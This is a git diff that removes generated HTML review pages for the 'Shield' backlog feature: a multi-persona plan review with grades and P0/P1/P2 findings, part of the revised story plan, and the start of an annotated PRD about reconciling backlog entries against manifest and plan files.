-<li><strong>[P0-1 — fix]</strong> Read against the <strong>pinned manifest contract</strong> (see TRD §11 addition): <code>manifest.json</code> = <code>{schema_version, features:[{name, artifacts:{research,prd,plan_json,...}}]}</code> — a list keyed by <code>name</code>, <code>plan_json</code> is a boolean flag, <strong>no plan path stored</strong>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> badges derived from the pinned manifest shape; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a></li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); <strong>LOCKED</strong> exact-normalized match (<code>casefold()</code> + collapsed ws); suggest by scanning manifest + candidate plan.json; never block capture; tie → surface all, auto-pick none.
-<ul>
-<li><strong>[P0-1 — fix]</strong> <code>suggest_feature(text, *, manifest)</code> and <code>suggest_epic(text, *, feature, plans)</code> are typed against the real shapes: <code>manifest.features[].name</code>; <code>plans</code> is <code>dict[feature-slug → parsed plan.json]</code>, the path derived as <code>docs/shield/&lt;slug&gt;/plan.json</code> for features with <code>artifacts.plan_json == true</code>.</li>
-<li><strong>[P1-3 — fix]</strong> <code>suggest_feature</code> returns <code>features[].name</code>, which <strong>is</strong> the folder slug (invariant pinned in EPIC-1-S1).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate when matches exist; <code>auth</code> fixture surfaces <code>auth</code> top candidate + 2-way tie auto-picks neither; <strong>a suggested feature value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path</strong>; capture succeeds proposed-new when none.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-epic-suggester.md#api-contracts"><code>epic-suggester</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code> (F6).</p>
-<ul>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted (F6); tool never auto-routes.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#product-journey">TRD §4 Product Journey</a></li>
-</ul>
-<blockquote>
-<p><strong>Intra-epic dependency:</strong> EPIC-3-S3 consumes EPIC-3-S1 + EPIC-3-S2 and lands after both.</p>
-</blockquote>
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, apply the single <strong>&quot;epic landed&quot; predicate</strong> (F8).</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code>; never-remove-on-doubt; drift tolerance with logged warning; log every removal <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code>.
-<ul>
-<li><strong>[P0-2 — fix]</strong> Match key: <strong>existing epic by normalized <code>name</code></strong> (NOT by <code>EPIC-N</code> id — ids are positional slots reassigned on every re-<code>/plan</code>, so id-matching breaks across re-plans). Proposed-new also by normalized name. <code>EPIC-N</code> is only a within-one-plan disambiguator. Story status never consulted.</li>
-<li><strong>[P0-1 — fix]</strong> <code>reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -&gt; RemovalDecision</code> — <code>manifest</code> is the parsed <code>{schema_version, features:[...]}</code>; <code>plans</code> maps feature-slug → parsed plan.json (path derived, not stored). Define the <code>RemovalDecision</code> dataclass carrying the F9 log fields <strong>[P2]</strong>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> removed only when an epic with <strong>normalized-exact name</strong> is present in <code>plan.json.epics[]</code> (story status not consulted); prd-only not removed; epic-name collision across two features → ambiguous → stays; <strong>an epic reordered across a re-plan still resolves correctly</strong>; malformed/old shapes → stays (logged), no exception; every removal emits the structured log line.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a> · LLD <a href="../../../lld-reconciler.md#sequence-flows"><code>reconciler</code> §6 Sequence flows</a></li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent--kill-switch-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code>; lazy sweep on view. Both idempotent; both call the one engine. Lands after S1 + S2.</p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook; lazy sweep; idempotent remove-if-present + shared engine; debug-gated latency line.
-<ul>
-<li><strong>[P0-3 — fix]</strong> Extend <code>shield/schemas/shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + a config example — the current schema has <code>additionalProperties: false</code>, so the kill switch fails validation without this. (Reflected in the EPIC-4-S2 version bump.)</li>
-<li><strong>[P1-1 (agile/sre) — fix]</strong> Resolve the N4 recovery OR: <strong>v1 default = <code>.shield/backlog-removed.log</code></strong> (append the entry <em>before</em> the destructive remove); commit-before-prune is an explicit non-goal. Update TRD §6 N4 + §14 step 2 to name the single mechanism.</li>
-<li><strong>[P2 — sre]</strong> Drop &quot;independently&quot; (one coupled boolean); surface &quot;N entries removed since last view (see backlog-removed.log)&quot; on view; define the removed-log lifecycle (gitignored, append-only, manual rotation); specify &quot;no-op prune emits no log line&quot;; state the N2 WARN threshold (&quot;&gt;1s&quot;).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> eager prune removes the referenced entry at end of run; lazy sweep removes plan-committed entries; second pass is a no-op (idempotent); shared engine; <strong><code>backlog.auto_reconcile=false</code> (now schema-valid) disables both</strong>; <strong>an end-of-run prune appends to <code>.shield/backlog-removed.log</code> before the remove; replaying the log restores the entry</strong>; debug latency line reports view+sweep wall time.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a> · LLD <a href="../../../lld-reconciler.md#concurrency-and-state"><code>reconciler</code> §8 Concurrency &amp; state</a></li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays via epic-name collision, malformed-stays, <strong>re-planned-epic-reorder-still-resolves</strong>, <strong>manifest-from-real-schema</strong>); evals for each behavior incl. duplicate-id rejection.
-<ul>
-<li><strong>[P1-1 — fix]</strong> Concurrency eval asserts <strong>detection</strong>: a concurrent on-disk change between read and replace is refused (<code>BacklogInvalid</code>), no lost entry — not a race the design forbids.</li>
-<li><strong>[P1 (security P1-b) — fix]</strong> Write-side eval: <code>capture()</code> producing a schema-invalid doc raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged (no <code>.tmp</code> promoted).</li>
-<li><strong>[P1 (security P1-c) — fix]</strong> Recovery-rehearsal eval asserts recoverability across a crash at the ordering seam (after log-append/before remove).</li>
-<li>no-stamping eval (F6): plan.json + story records byte-unchanged after promotion.</li>
-<li><strong>[P1 / DX P1 — fix]</strong> Name the concrete CI entrypoint (the actual workflow file + runner under <code>shield/evals/</code> or <code>.github/workflows/</code>), not a task; path-filter glob <code>shield/{schema,scripts,skills/general/backlog}/**</code>, <code>shield/commands/backlog.md</code>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> suite covers all listed behaviors (incl. compare-before-replace detection, write-side refusal, ordering-seam recovery, re-plan epic-reorder); self-contained (no API/LLM); PR body has RED + GREEN; named CI runner runs on the glob.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#milestones">TRD §10 Milestones</a></li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code> + <code>backlog_store</code> <code>pyproject.toml</code> (now <strong>unconditional</strong> per P1-4); finalize command/skill docs (capture, three triggers, kill switch, match key, manual remove, badges, <strong>wrong-removal recovery procedure</strong>); commit the <code>shield.schema.json</code> <code>backlog</code> change (P0-3); document a <strong>fixed</strong> audit interval + numeric trigger (PRD §7 thresholds); explicit DoD lines; CHANGELOG.
-<ul>
-<li><strong>[P2 — PM]</strong> Add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); add coarse effort/impact per milestone (PM4); quantify the v1-audit target (PM10).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> version bumped in same commit (incl. schema change); SKILL.md documents capture/view/promote/remove + 3 triggers + kill switch + audit cadence + recovery procedure; explicit DoD lines present; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#references">TRD §13 References</a></li>
-</ul>
-<hr />
-<h2 id="carried-forward--validate-the-bet">Carried forward + validate-the-bet</h2>
-<ul>
-<li>The prior PRD-review carry-forwards (capture interface, schema_version, drift tolerance, idempotency) remain folded (EPIC-1-S1/S2, EPIC-3-S2/S3).</li>
-<li>PM10 decision unchanged: ship M1, validate the bet from <code>backlog.json</code>'s 30-day git history before investing in M2/M3.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li>Fold the 3 P0s (+ the P1s) in one editing pass on TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S2/S3, EPIC-1-S1/S2, EPIC-4-S1/S2. No story restructuring needed.</li>
-<li>Re-run <code>/plan-review</code> to confirm the P0s clear, then <code>/pm-sync</code> and <code>/implement</code> from M1.</li>
-</ul>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
deleted file mode 100644
index d955a64a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
+++ /dev/null
@@ -1,206 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-ready--composite-349-b--3-p0--8-p1-since-applied--see-resolution-above">Verdict: Ready — composite 3.49 (B+) ⚠️ (3 P0 + 8 P1 since applied — see Resolution above)</a>
-</li>
-<li><a href="#scorecard">Scorecard</a>
-</li>
-<li><a href="#deterministic-gates-run-before-dispatch">Deterministic gates (run before dispatch)</a>
-</li>
-<li><a href="#p0--blockers-fix-before-implement">P0 — Blockers (fix before /implement)</a>
-</li>
-<li><a href="#p1--should-fix-for-plan-quality">P1 — Should fix for plan quality</a>
-</li>
-<li><a href="#p2--nice-to-have">P2 — Nice to have</a>
-</li>
-<li><a href="#detailed-agent-findings">Detailed agent findings</a>
-</li>
-<li><a href="#recommendation">Recommendation</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review--shield-backlog-backlog-20260527">Plan Review — Shield Backlog (<code>backlog-20260527</code>)</h1>
-<p><strong>Date:</strong> 2026-05-29 · <strong>Run:</strong> 1 · <strong>Source PRD:</strong> prd.md (type: lean) · <strong>Plan:</strong> plan.md + trd.md + plan.json (schema 1.5)
-<strong>Reviewers:</strong> dx-engineer, agile-coach, backend-engineer, sre, security-engineer, product-manager (PM1–PM10)</p>
-<blockquote>
-<p><strong>✅ Resolution (applied 2026-05-29):</strong> the user chose &quot;Apply P0+P1 to the plan.&quot; All <strong>3 P0</strong> and <strong>8 P1</strong> findings have been folded into the canonical artifacts (plan.json, trd.md, the 3 LLD drafts) and <code>shield/schemas/shield.schema.json</code> (additive <code>backlog</code> object). Re-validation: <code>validate_plan.py</code> ✅, <code>validate_trd.py</code> ✅ (milestone-drift clean), kill-switch <code>.shield.json</code> validates ✅, all 3 LLD drafts structurally ✅. The plan is now clear for <code>/implement</code>. See <code>plan.json</code> <code>metadata.plan_review_2026_05_29.{p0_applied,p1_applied}</code> for the per-finding trace. The findings below are retained as the review record.</p>
-</blockquote>
-<h2 id="verdict-ready--composite-349-b--3-p0--8-p1-since-applied--see-resolution-above">Verdict: <strong>Ready — composite 3.49 (B+)</strong> ⚠️ <em>(3 P0 + 8 P1 since applied — see Resolution above)</em></h2>
-<p>The re-plan is a clear improvement on the prior run (3.14 → 3.49): the deferred TRD landed, schema is 1.5, and the prior P0 (gate-0d duplication) + the SRE/Security P1 set are verifiably folded in. <strong>However</strong>, the backend reviewer — checking the design against the <em>live</em> Shield schemas rather than only against itself — surfaced <strong>3 P0 contract defects</strong> that each break a core path at implementation time. The weighted composite lands in &quot;Ready&quot; range, but the P0s gate <code>/implement</code>. All three are localized contract-pinning fixes, not design rework.</p>
-<h2 id="scorecard">Scorecard</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Grade</th>
-<th>Numeric</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td>1.0</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td>1.0</td>
-<td>B−</td>
-<td>2.7</td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td>1.0</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td>0.7</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>SRE / Operations</td>
-<td>0.7</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Product Manager (PM1–PM10 avg)</td>
-<td>0.7</td>
-<td>A</td>
-<td>3.6</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>B+</strong></td>
-<td><strong>3.49 → Ready</strong></td>
-</tr>
-</tbody>
-</table>
-<p>PM dim grades: PM1 A · PM2 A · PM3 A · PM4 B · PM5 B · PM6 B · PM7 A · PM8 A · PM9 A · PM10 B → avg 3.6.</p>
-<h2 id="deterministic-gates-run-before-dispatch">Deterministic gates (run before dispatch)</h2>
-<table>
-<thead>
-<tr>
-<th>Gate</th>
-<th>Result</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>0a schema (<code>validate_plan.py</code>)</td>
-<td>✅ exit 0</td>
-</tr>
-<tr>
-<td>0b TRD sections (<code>validate_trd.py</code>)</td>
-<td>✅ exit 0 (incl. milestone-drift)</td>
-</tr>
-<tr>
-<td>0c stale anchors</td>
-<td>✅ none</td>
-</tr>
-<tr>
-<td>0d PRD↔TRD duplication (§2/§5)</td>
-<td>✅ 6-char / 3-char overlap (≤80) — prior P0 resolved</td>
-</tr>
-<tr>
-<td>0e impl-manual (§7 fence &gt;20 lines)</td>
-<td>⚠️ §7 ASCII diagram is 27 lines, but §8 has 5 populated alternatives → escape satisfied (not P0)</td>
-</tr>
-<tr>
-<td>0f touches_lld_drift</td>
-<td>✅</td>
-</tr>
-<tr>
-<td>0g lld_components_integrity</td>
-<td>✅</td>
-</tr>
-<tr>
-<td>0h undocumented_lld</td>
-<td>n/a — no canonical <code>docs/lld/</code> (all net-new)</td>
-</tr>
-<tr>
-<td>0i lld_draft_review (3 drafts)</td>
-<td>✅ all 14 always-on + 8 forced subsections present, no vague TBDs</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0--blockers-fix-before-implement">P0 — Blockers (fix before <code>/implement</code>)</h2>
-<p>All three independently verified against live schemas (<code>shield/schemas/{shield,plan}.schema.json</code>, <code>docs/shield/manifest.json</code>).</p>
-<ol>
-<li><strong>Reconciler/suggester contracts don't match the real <code>manifest.json</code>/<code>plan.json</code> shapes</strong> <em>(backend P0-1)</em>. <code>manifest.json</code> is <code>{schema_version, features:[{name, artifacts:{…plan_json: bool…}, reviews, updated}]}</code> — a list keyed by <code>name</code>, with a boolean <code>plan_json</code> flag and <strong>no stored plan path</strong>. <code>reconcile(entry, *, manifest, plans)</code> (lld-reconciler §5) never defines <code>plans</code> and never says the path must be <em>derived</em>. <strong>Fix:</strong> pin the real shapes; define <code>plans: dict[slug→plan]</code> populated by reading <code>docs/shield/&lt;feature&gt;/plan.json</code> for each feature with <code>artifacts.plan_json == true</code>; add a fixture from the actual manifest schema. <em>(Also covers DX P1 manifest read-contract.)</em></li>
-<li><strong>Existing-epic matching keys off a positional slot, not an identity</strong> <em>(backend P0-2)</em>. Epic ids are <code>EPIC-N</code> slugs assigned by <code>/plan</code> (<code>EPIC-2</code> = different epics in different plans, verified). After any re-<code>/plan</code>, an existing-epic entry stamped <code>EPIC-2</code> matches the wrong epic or rots. <strong>Fix:</strong> match existing epics by normalized <code>name</code> too (same predicate as proposed-new); treat <code>EPIC-N</code> only as a within-one-plan disambiguator; add a &quot;epic reordered across a re-plan&quot; eval.</li>
-<li><strong>Kill switch <code>backlog.auto_reconcile</code> is unshippable under the current <code>.shield.json</code> schema</strong> <em>(backend P0-3)</em>. <code>shield.schema.json</code> has <code>additionalProperties: false</code> and no <code>backlog</code> key; adding the flag fails validation, and no story includes the schema change. <strong>Fix:</strong> add a task+AC (EPIC-3-S3, version-bump in EPIC-4-S2) extending <code>shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + config example. Without it the documented first-line rollback (TRD §14) cannot ship.</li>
-</ol>
-<h2 id="p1--should-fix-for-plan-quality">P1 — Should fix for plan quality</h2>
-<ol>
-<li><strong>Resolve the EPIC-3-S3 N4 recovery OR</strong> <em>(agile AC7 + sre P1-1)</em>. AC5 encodes &quot;commit-before-prune <strong>or</strong> removed-log&quot; — not writable as one test, and the §14 runbook can't be precise. Pick one v1 default (<strong>recommend <code>.shield/backlog-removed.log</code></strong> — avoids forcing a possibly-dirty-tree commit on every prune, decouples recovery from git state mid-<code>/implement</code>); make the other a non-goal.</li>
-<li><strong>Add lost-update detection (compare-before-replace)</strong> <em>(backend P1-1 + security P1-a)</em>. The concurrency eval tests a race the single-writer design forbids, and N5, if silently violated, yields a silent lost update. Have <code>capture()</code>/<code>remove()</code> carry the schema_version+entry-count (or mtime/hash) read at start and refuse <code>os.replace()</code> if the file changed underneath — a loud <code>BacklogInvalid</code> instead of a lost entry, <strong>no lockfile</strong>. Then the eval tests a real, detectable behavior.</li>
-<li><strong>Reword &quot;schema rejects duplicate id&quot; → validator</strong> <em>(backend P1-2)</em>. JSON Schema 2020-12 can't express property-level array uniqueness; F2 + EPIC-1-S1 AC must say <code>validate_backlog.py</code> enforces it (<code>duplicate_entry_id</code>).</li>
-<li><strong>Pin the feature <code>name</code> == folder-slug invariant</strong> <em>(backend P1-3)</em>. <code>suggest_feature</code> returns manifest <code>features[].name</code>, but the reconciliation key is the folder slug; if they differ, suggestion proposes an unresolvable value. Document the invariant + add a &quot;suggested value resolves to an existing <code>docs/shield/&lt;value&gt;/</code>&quot; fixture.</li>
-<li><strong>Resolve the packaging model</strong> <em>(backend P1-4)</em>. F3 (&quot;every capturing skill builds against this signature&quot;) implies an importable module; EPIC-4-S2 hedges. Decide at plan time — package <code>backlog_store</code> with a <code>pyproject.toml</code> so the version bump is unconditional; document the import path skills use.</li>
-<li><strong>Resolve the CI entrypoint to a concrete value</strong> <em>(dx P1)</em>. EPIC-4-S1 still phrases the runner as a task; name the actual workflow file + runner so the eval-gate AC is verifiable.</li>
-<li><strong>Add a write-side validation eval</strong> <em>(security P1-b)</em>. &quot;validate-or-refuse on read/<strong>write</strong>&quot; is asserted but only read-side + crash-mid-write are tested. Add: <code>capture()</code> producing a schema-invalid doc raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged.</li>
-<li><strong>Test the recovery ordering seam</strong> <em>(security P1-c)</em>. Strengthen the recovery-rehearsal eval to assert recoverability across a crash <em>between</em> log-append and remove (and between remove and commit), not just after a clean wrong-removal.</li>
-</ol>
-<h2 id="p2--nice-to-have">P2 — Nice to have</h2>
-<ul>
-<li><strong>DX:</strong> fixed audit interval + numeric trigger (not &quot;e.g. monthly&quot;); state runtime prereqs (Python/uv, pydantic+jsonschema) once in SKILL.md; label the 3.12 (PRD-review) vs 3.14 (plan-review) composites inline.</li>
-<li><strong>Agile:</strong> consider splitting EPIC-3-S3 into S3a (triggers) + S3b (kill switch + recovery + latency); note EPIC-2 deliberately straddles M1/M2; state the N2 WARN threshold (&quot;&gt;1s&quot;).</li>
-<li><strong>SRE:</strong> drop &quot;independently&quot; from the kill-switch description (it's one coupled boolean); add a &quot;N entries removed since last view&quot; notice so wrong-removals aren't pull-only; define the removed-log lifecycle (tracked vs gitignored, rotation); require the wrong-removal recovery procedure in SKILL.md; specify no-op-prune logging.</li>
-<li><strong>Backend:</strong> add <code>os.fsync()</code> + a unique <code>.tmp</code> suffix; consider <code>read() -&gt; BacklogDoc</code> (pydantic) over raw dict; define the <code>RemovalDecision</code> dataclass (the F9 log fields).</li>
-<li><strong>Security:</strong> give <code>.shield/backlog-removed.log</code> a schema/parser + tracked-status decision; make dry-run/fixture mode provably non-destructive (force sweep off) + eval it; add a forward note that a future <code>migrate()</code> must be validate-or-refuse.</li>
-<li><strong>PM:</strong> add coarse effort/impact per milestone (PM4); add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); quantify the operational cost the tool recovers as a falsifiable v1-audit target (PM10).</li>
-</ul>
-<h2 id="detailed-agent-findings">Detailed agent findings</h2>
-<ul>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/backend-engineer.md">Backend Engineer</a> — B− (the 3 P0s + 4 P1s)</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/dx-engineer.md">DX Engineer</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/security-engineer.md">Security Engineer</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/agile-coach.md">Agile Coach</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/sre.md">SRE / Operations</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/product-manager.md">Product Manager (PM1–PM10)</a> — A</li>
-</ul>
-<h2 id="recommendation">Recommendation</h2>
-<p>The plan is <strong>Ready in substance</strong> — strong scope discipline, testable ACs, an acyclic milestone DAG, clean trust boundaries, and an honest threat model. But do <strong>not</strong> start <code>/implement</code> until the <strong>3 P0 contract fixes</strong> land: they are the difference between a plan that reads consistently and one whose reconciler, epic-matching, and kill switch actually work against the real Shield artifacts. The P1s (recovery-mechanism choice, lost-update detection, packaging) are best folded in the same revision pass. Estimated effort: one focused editing pass on the TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S3, and EPIC-4-S1/S2 — no story restructuring required.</p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
deleted file mode 100644
index d2253360..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
+++ /dev/null
@@ -1,316 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield PRD Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield PRD Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/prd/2026-05-27/</code>)</div>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<!-- [PRD-Review enhanced copy — 2026-05-27. Annotations are HTML comments tagged [P0]/[P1]/[P2] with persona attribution. Source content is unchanged; only comments were added. Verdict: Needs Work (composite 2.7, blocked by 1 P0). -->
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<!-- [P2 from: PM] 7c — Sign-off N/A names no confirmer. Phrase as: "N/A — internal tooling, no Legal/Security/Support surface (confirmed by @ashwinimanoj)". -->
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed only when this epic's work appears in the feature's <code>plan.json</code>.</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan). A <code>prd</code>-only feature does <strong>not</strong> trigger removal.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: DX] Reconciliation match key UNSPECIFIED: with ids removed, define how a proposed-new epic name maps to the eventual real epic in plan.json — exact string match, or user-confirmed binding at promotion time? This is the removal-correctness heart; resolve before /plan. -->
-<!-- [P1 from: DX] `kind` field: §6/M1 commit to epic/story/task granularity and "schema defined", but the backing field is left open in §9. Decide it before M1. -->
